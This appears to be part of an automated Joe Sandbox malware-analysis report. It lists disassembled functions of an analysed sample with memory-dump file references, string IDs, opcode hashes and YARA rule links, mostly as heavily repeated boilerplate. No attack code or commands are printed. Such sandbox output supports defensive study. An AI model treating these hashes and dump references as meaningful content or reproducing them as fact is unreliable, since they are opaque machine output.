                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: $96w$c]
                                                                                          • API String ID: 2994545307-247510824
                                                                                          • Opcode ID: a47e7ed7907a57c482f950db6ccaa9907add4b502c909a99e79b67a46407ace2
                                                                                          • Instruction ID: c45f7de2dbd4f92a264dd95416aa5b8eeed34c4e0920eb665e13c1c7d2a89cb7
                                                                                          • Opcode Fuzzy Hash: a47e7ed7907a57c482f950db6ccaa9907add4b502c909a99e79b67a46407ace2
                                                                                          • Instruction Fuzzy Hash: 58222571208341ABDB24CF25C991B6FBBE2EBD5314F14893EE98987391D7B8D801CB56
                                                                                          Function 004B3A90 Relevance: 3.1, Strings: 2, Instructions: 647COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: bBK$rBK
                                                                                          • API String ID: 0-3079827781
                                                                                          • Opcode ID: 5be84219b815308194b9073e31ed80d5bcabac52a1eff1532338168b6848c43e
                                                                                          • Instruction ID: e7edcfd70354f5d8f9467ba6f8c78e8a1ffadc6932a01fec0dcd2a08d758d452
                                                                                          • Opcode Fuzzy Hash: 5be84219b815308194b9073e31ed80d5bcabac52a1eff1532338168b6848c43e
                                                                                          • Instruction Fuzzy Hash: 86120331A08251CFCB08CF69D8A12AEBBF1EFC9314F19897ED58697391D7349902CB95
                                                                                          Function 0049D2FD Relevance: 3.0, Strings: 2, Instructions: 457COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RLjo$ZDRW
                                                                                          • API String ID: 0-2283519047
                                                                                          • Opcode ID: 266ae9f58c3a9711da02b00521f7faa48e6330420c4f47eb7351824814134c45
                                                                                          • Instruction ID: 553f2662e27e6e0d0c94078da2863f89ae612f11d9508de2ce02fbf2ea01ea9b
                                                                                          • Opcode Fuzzy Hash: 266ae9f58c3a9711da02b00521f7faa48e6330420c4f47eb7351824814134c45
                                                                                          • Instruction Fuzzy Hash: FFD1D2B19083409FDB14DF64D8C16ABBBF1EF95304F04893EE99987362E7789805CB5A
                                                                                          Function 004930E0 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$c
                                                                                          • API String ID: 0-1220095849
                                                                                          • Opcode ID: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                                          • Instruction ID: f52b97a5e34df61be00031ff332fe515bd2e7e710fdf42407a225a1c84046b32
                                                                                          • Opcode Fuzzy Hash: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                                          • Instruction Fuzzy Hash: 9FD10571608340ABD7009F25D882BAFBFE9DBD6714F18882EF89497381D678DD068797
                                                                                          Function 004B3D90 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: bBK$rBK
                                                                                          • API String ID: 0-3079827781
                                                                                          • Opcode ID: 34ac02eecd2c4574e7c41a3fc18090eeaf8b307742bacd00efc83d2ba99faefa
                                                                                          • Instruction ID: ba69074f5d77eea30de10ae359e2ed71bd769d29a70a6808bc33a5b82a1abe00
                                                                                          • Opcode Fuzzy Hash: 34ac02eecd2c4574e7c41a3fc18090eeaf8b307742bacd00efc83d2ba99faefa
                                                                                          • Instruction Fuzzy Hash: 91C1D032E05211DFCB08CF69D8912EEBBF2EBC9314F19857DE589A7341D734A9028B95
                                                                                          Function 00473930 Relevance: 2.9, Strings: 2, Instructions: 404COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Inf$NaN
                                                                                          • API String ID: 0-3500518849
                                                                                          • Opcode ID: ecc1bd6e58cf5c96eea7ad92ab8afbb0849fe3ddeaad6214f9d923d72672b6fc
                                                                                          • Instruction ID: 83e85c4383894121e65a084f0d60f241633df5f2d38e8ae89bbf99c1133e2569
                                                                                          • Opcode Fuzzy Hash: ecc1bd6e58cf5c96eea7ad92ab8afbb0849fe3ddeaad6214f9d923d72672b6fc
                                                                                          • Instruction Fuzzy Hash: B9D12772A083019BC714CF28C88069BB7E5EFC4750F25CA2EF89997390E775ED059B86
                                                                                          Function 004B2700 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
